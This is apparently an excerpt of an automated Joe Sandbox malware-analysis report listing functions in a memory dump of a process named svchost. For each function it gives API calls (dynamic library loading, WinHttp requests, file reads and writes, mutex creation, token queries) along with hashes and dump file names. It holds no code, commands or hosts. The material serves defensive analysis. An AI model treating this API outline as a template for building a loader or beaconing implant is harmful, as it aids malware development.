Opcode Fuzzy Hash: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
Instruction Fuzzy Hash: C3026EB2600B8195FB62DF63E8503ED27A4F748BC8F444426EB4A976BADF39C945C740

Function 000000014000C3F0 Relevance: 18.2, APIs: 12, Instructions: 170
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryExW.KERNELBASE ref: 000000014000C46D
LoadLibraryExW.KERNELBASE ref: 000000014000C4CD
GetProcAddress.KERNEL32 ref: 000000014000C500
GetProcAddress.KERNEL32 ref: 000000014000C533
GetProcAddress.KERNEL32 ref: 000000014000C566
GetProcAddress.KERNEL32 ref: 000000014000C599
GetProcAddress.KERNEL32 ref: 000000014000C5CC
GetProcAddress.KERNEL32 ref: 000000014000C5FF
GetProcAddress.KERNEL32 ref: 000000014000C632
GetProcAddress.KERNEL32 ref: 000000014000C665
GetProcAddress.KERNEL32 ref: 000000014000C694
GetProcAddress.KERNEL32 ref: 000000014000C6C3

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$memset
String ID:
API String ID: 2529764867-0
Opcode ID: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
Instruction ID: 5d690c7c490bd090bdbf8754a9ee11121f4ef864398ce79e0bcd1f78a3723631
Opcode Fuzzy Hash: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
Instruction Fuzzy Hash: 2A911871615B8585EA23DB16F8603E933B0FB8C7C8F44142AA78D4B67AEF79D905CB40

Function 0000000140001730 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 295
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00000001400018E3
memcpy.MSVCRT ref: 0000000140001910
_time64.MSVCRT ref: 00000001400019F4
_localtime64.MSVCRT ref: 0000000140001A05
wcsftime.MSVCRT ref: 0000000140001A6C
HeapFree.KERNEL32 ref: 0000000140001BB0
HeapFree.KERNEL32 ref: 0000000140001BC3

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Strings

<, xrefs: 00000001400019FA

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeapmemcpy$AddressLibraryLoadProc_localtime64_time64wcsftime
String ID: <
API String ID: 2118791860-4251816714
Opcode ID: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
Instruction ID: 7b3512f6305f96da40dd492177f831db69bdef71e394fa92b440c6adabb0c7d5
Opcode Fuzzy Hash: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
Instruction Fuzzy Hash: 3ED15176600B8586EB21DF26E4503EE73A0FB89BC8F544125EF8A47B69EF39C945C740

Function 000000014000A3D0 Relevance: 13.8, APIs: 9, Instructions: 311
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE ref: 000000014000A546
HeapFree.KERNEL32 ref: 000000014000A567
HeapFree.KERNEL32 ref: 000000014000A42F

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

CreateFileW.KERNELBASE ref: 000000014000A4B4
SetFilePointer.KERNELBASE ref: 000000014000A4DE
SetFilePointer.KERNELBASE ref: 000000014000A4FC
HeapFree.KERNEL32 ref: 000000014000A6BE

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

rand.MSVCRT ref: 000000014000A7E4
HeapFree.KERNEL32 ref: 000000014000A8D8

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AddressFileFreeProc$Pointer$AllocateCreateLibraryLoadProcessReadrand
String ID:
API String ID: 2430904750-0
Opcode ID: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
Instruction ID: 44fc61901c645cc289ec697281c9d597236c5fc786e5eaf41bf353a4e8eb591f
Opcode Fuzzy Hash: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
Instruction Fuzzy Hash: E2D161B2211B8585EB62DF26E8503EA37E4F749BC8F448015EF894B7A9DF39C945C740

Function 000000014000DC30 Relevance: 12.2, APIs: 8, Instructions: 213
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000D420: WinHttpOpen.WINHTTP ref: 000000014000D49C

GetTickCount.KERNEL32 ref: 000000014000DC8A
WinHttpCloseHandle.WINHTTP ref: 000000014000DD27
WinHttpConnect.WINHTTP ref: 000000014000DD42
HeapFree.KERNEL32 ref: 000000014000DE9A
WinHttpCloseHandle.WINHTTP ref: 000000014000DF5B
WinHttpCloseHandle.WINHTTP ref: 000000014000DF6E
WinHttpCloseHandle.WINHTTP ref: 000000014000DF7E
HeapFree.KERNEL32 ref: 000000014000DF9A

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseHandle$FreeHeap$ConnectCountOpenTickmemset
String ID:
API String ID: 2154369044-0
Opcode ID: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
Instruction ID: 6968e017db492f2cf7c0abe04c4aaab3eddd08ff69e7388afb2cb71fd0606d81
Opcode Fuzzy Hash: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
Instruction Fuzzy Hash: 6BA1E172211BC185EB62DF22E8503EE33A1FB99BC8F445016EB895BB69DF39C585C710

Function 000000014000D630 Relevance: 12.1, APIs: 8, Instructions: 109
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinHttpCloseHandle.WINHTTP ref: 000000014000D668
WinHttpSetTimeouts.WINHTTP ref: 000000014000D68C
WinHttpOpenRequest.WINHTTP ref: 000000014000D703
WinHttpSetOption.WINHTTP ref: 000000014000D73B
WinHttpSendRequest.WINHTTP ref: 000000014000D75E
WinHttpReceiveResponse.WINHTTP ref: 000000014000D76E
WinHttpQueryHeaders.WINHTTP ref: 000000014000D79E
WinHttpCloseHandle.WINHTTP ref: 000000014000D7C1

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
String ID:
API String ID: 1140403012-0
Opcode ID: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
Instruction ID: eebc90c8ce48de3e98ba809765a9d91c4a9be35668c6a490bbbc6456ef9780f7
Opcode Fuzzy Hash: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
Instruction Fuzzy Hash: C241B172208B8486EB25CF26F4507EA77A4F78CB88F54411AEB8D47768EF39C584CB50

Function 000000014000E580 Relevance: 12.1, APIs: 8, Instructions: 71
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryA.KERNEL32 ref: 000000014000E5BE

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32 ref: 000000014000E5E0
GetProcAddress.KERNEL32 ref: 000000014000E612
GetProcAddress.KERNEL32 ref: 000000014000E63D
GetProcAddress.KERNEL32 ref: 000000014000E668
GetProcessHeap.KERNEL32 ref: 000000014000E67E
RtlAllocateHeap.NTDLL ref: 000000014000E6A9

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$Heap$Allocate$LibraryLoadProcessmemcpymemset
String ID:
API String ID: 2235880649-0
Opcode ID: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
Instruction ID: a4c0c1064b289df270925e2bef4429f91acbcf3427644b2579803443337a3f80
Opcode Fuzzy Hash: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
Instruction Fuzzy Hash: BD3105B5205B8581EA22DB16F9403D923A5FB8CBC8F484525EB8D17B7AEF7DC549C700

Function 00000001400051B0 Relevance: 9.2, APIs: 6, Instructions: 167
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

CreateFileW.KERNELBASE ref: 0000000140005256
HeapFree.KERNEL32 ref: 000000014000530D
SysAllocString.OLEAUT32 ref: 00000001400053E9
SysFreeString.OLEAUT32 ref: 0000000140005400
HeapFree.KERNEL32 ref: 0000000140005423
HeapFree.KERNEL32 ref: 000000014000543D

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String$AllocCreateFilememset
String ID:
API String ID: 3826130954-0
Opcode ID: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
Instruction ID: f085215ec8c7c62c59a82486073123279e41f5413f1e3ba3c0ef527c3a066285
Opcode Fuzzy Hash: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
Instruction Fuzzy Hash: C261817260578485EA62EF17F4107EB63A0F78EBD6F488125EF8903BA5DE78C845C740

Function 000000014000E2B0 Relevance: 6.1, APIs: 4, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000014000E2D4
memset.MSVCRT ref: 000000014000E2F0
LoadLibraryExW.KERNELBASE ref: 000000014000E36F
GetProcAddress.KERNEL32 ref: 000000014000E3BB

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??2@AddressLibraryLoadProcmemset
String ID:
API String ID: 2223267934-0
Opcode ID: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
Instruction ID: 81936db8f0c84c524282d08abef79f670da5901e330344387f2b7120425cec9c
Opcode Fuzzy Hash: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
Instruction Fuzzy Hash: B031A832610B8095EB22DF16F8543DE77A0F788BC8F884426EF995766ADF39CA45C740

Function 0000000140002500 Relevance: 4.6, APIs: 3, Instructions: 88
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 0000000140002562
CloseHandle.KERNELBASE ref: 000000014000261D
HeapFree.KERNEL32 ref: 0000000140002637

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027B7
Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027D1
Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027EB

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$AddressCloseCreateFileHandleLibraryLoadProc
String ID:
API String ID: 1237944557-0
Opcode ID: 3d1678507d8a74de0c1391a12187dbe278e385b8dddfb17ae8026b01f3ab009b
Instruction ID: ca56da1b213637803f01061fd849376b3d0a0030e2058871fe79c7c9f7f8287a
Opcode Fuzzy Hash: 3d1678507d8a74de0c1391a12187dbe278e385b8dddfb17ae8026b01f3ab009b
Instruction Fuzzy Hash: 10314832204B8486E761DF17A854B9AB7A4F78CFD4F544229EF9D53BA8CF39C9018B40

Function 00000001400175A0 Relevance: 4.6, APIs: 3, Instructions: 86
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140017624
CreateMutexExW.KERNELBASE ref: 00000001400176BD
exit.MSVCRT ref: 00000001400176EA

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$ConvertCreateMutexStringexitmemset
String ID:
API String ID: 3507615276-0
Opcode ID: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
Instruction ID: b79e1125e13a50f3d4fcebabcacaf9d25f3fc3441ac5dd85b6d2232f2856bb17
Opcode Fuzzy Hash: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
Instruction Fuzzy Hash: 6D416D72204B8581DB228F16E4507EA77B0FB8DBC5F448066EB8D47769DF79C946CB40

Function 000000014000CC50 Relevance: 4.6, APIs: 3, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000000014000CC79
OpenProcessToken.ADVAPI32 ref: 000000014000CC8D
GetTokenInformation.KERNELBASE ref: 000000014000CCC3

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$CurrentInformationOpen
String ID:
API String ID: 2743777493-0
Opcode ID: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
Instruction ID: c74a2c0aa10743c207ec1e219136a5575fa09d5bc2334c12703a290418d10ba9
Opcode Fuzzy Hash: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
Instruction Fuzzy Hash: 65311A72615B8686DB61CF16E4947EEBBE4FBC8B84F044126DB8943B28DF38D549CB40

Function 000000014000C0C0 Relevance: 3.2, APIs: 2, Instructions: 201libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

GetProcAddress.KERNEL32 ref: 000000014000C169
GetNativeSystemInfo.KERNELBASE ref: 000000014000C183

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressInfoNativeProcSystemmemset
String ID:
API String ID: 3639077814-0
Opcode ID: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
Instruction ID: 428b3f066b109f255c39e2ebfc4fbc54e526bd0559da4fecb65a859fdc128361
Opcode Fuzzy Hash: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
Instruction Fuzzy Hash: 8491FBB22116C595EF32CF26E8507EE37A0F7497C8F448012F7498BAA9DB79CA05C340

Function 000000014000CE20 Relevance: 3.1, APIs: 2, Instructions: 75filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 000000014000CE68
HeapFree.KERNEL32 ref: 000000014000CF06

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFileFreeHeap
String ID:
API String ID: 1459815349-0
Opcode ID: b0f46708ea2e9a82fb6ec15b60a2f8f62c5783b32bb6e5bc0d22928c266d332d
Instruction ID: dd7d341a6ddd7bc526631075f0fb80800049f19760660bc5443f3113a62de7c7
Opcode Fuzzy Hash: b0f46708ea2e9a82fb6ec15b60a2f8f62c5783b32bb6e5bc0d22928c266d332d
Instruction Fuzzy Hash: 81314B7261478186E711DF17E494B9A7BA1F78CBD4F488129EF8907B68DF38C845CB80

Function 0000000140014E00 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

GetFileAttributesW.KERNELBASE ref: 0000000140014E75
CreateDirectoryW.KERNELBASE ref: 0000000140014EA4

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryFilememset
String ID:
API String ID: 3166985337-0
Opcode ID: 4414997ff2b509ba6580369a37436964f2c3685859dd0f9b5ad18fc1192e98c7
Instruction ID: d08f49fb03eb16788e1f2746a93b41f384ca2382fbf5292e5098abddaf048789
Opcode Fuzzy Hash: 4414997ff2b509ba6580369a37436964f2c3685859dd0f9b5ad18fc1192e98c7
Instruction Fuzzy Hash: 6B113072204B8581DB218F1AE4503EA77E0FBD8B88F548162E79C476B6DF39C546CB40

Function 000000014000CD70 Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 000000014000CDBB
WriteFile.KERNELBASE ref: 000000014000CDE4

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: e0412b5f0c366b7fd59986dc4c34bf7b5f1c6f6ff30c6d02afabf48581371de9
Instruction ID: 6b566774e5ba1e7250a1aff25ef7425d951c76e6d718e05acb62d09854b7e17e
Opcode Fuzzy Hash: e0412b5f0c366b7fd59986dc4c34bf7b5f1c6f6ff30c6d02afabf48581371de9
Instruction Fuzzy Hash: A7011E7261474086E7509F17F444B967AA0F78CFE4F544239AEA9437A4CB38C445CB40

Function 000000014000E410 Relevance: 2.6, APIs: 2, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

HeapFree.KERNEL32 ref: 000000014000E4F8
memcpy.MSVCRT ref: 000000014000E519

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeapmemcpymemset
String ID:
API String ID: 2272576838-0
Opcode ID: 51c18e91f1064303174560168aadc5c6aca566d20f6d0a89bb2b7eb6c954fee7
Instruction ID: 99e73f2228a508996cf4c8a13348c1bb41ea3070cc7838c9278a1e980f1624d9
Opcode Fuzzy Hash: 51c18e91f1064303174560168aadc5c6aca566d20f6d0a89bb2b7eb6c954fee7
Instruction Fuzzy Hash: DA314972605FC082EB62CF52B8507EA77A0FB8DBC5F445029EB8957B69EE39C545CB00

Function 00000159F28A0000 Relevance: 1.7, APIs: 1, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2670292321.00000159F28A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000159F28A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_159f28a0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
Instruction ID: 506f6ce6ae3d749395ba51f1ed03d0a12fd0800cc1e303c5ed1ea48ab79c9083
Opcode Fuzzy Hash: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
Instruction Fuzzy Hash: F771E570618E09EFDB94EF28C884F55B7E1FBA8315F60059AD00DCB655DB36E892CB81

Function 000000014000D420 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

WinHttpOpen.WINHTTP ref: 000000014000D49C

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: HttpOpenmemset
String ID:
API String ID: 3913899868-0
Opcode ID: c9046dffb573574fc25c40d42e7c3ffdc45ad70a92c9c4164a8d46b4ec7af5c7
